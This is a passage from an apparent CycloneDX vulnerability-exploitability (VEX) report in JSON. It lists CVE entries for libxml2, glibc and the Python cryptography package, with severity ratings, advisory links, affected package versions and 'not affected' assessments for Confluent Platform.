        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/2141260"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/work_items/1058"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6653"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8456-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6653"
        }
      ],
      "published": "2026-06-22T14:17:51+00:00",
      "updated": "2026-07-14T16:00:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6732",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        843
      ],
      "description": "A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6732"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11503"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6732"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461300"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1097"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6732"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6732"
        }
      ],
      "published": "2026-04-23T23:16:16+00:00",
      "updated": "2026-06-30T20:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6791",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        121
      ],
      "description": "When expanding paths that begin with a tilde (~) followed by a username, the internal parse_tilde function extracts the username to determine the user's home directory.  The implementation allocates memory for this username directly on the stack using the strndupa macro. Because the size of this allocation was determined by the length of the user-supplied input without any bounds checks, passing an excessively long username e.g. thousands of characters, forces the thread to exhaust its stack space. Thus if an application passes untrusted, attacker-controlled input to the wordexp function, an attacker can trigger a stack clash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6791"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6791"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6791"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34091"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6791"
        }
      ],
      "published": "2026-08-10T19:17:30+00:00",
      "updated": "2026-08-12T18:18:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69247",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        208,
        209
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.",
      "recommendation": "Upgrade cryptography to version 50.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69247"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/53fccd93413a8d7f07d6d8999681f27b75cffa3f"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/15369"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-g6cj-pr64-35w5"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/cryptography@46.0.7"
        },
        {
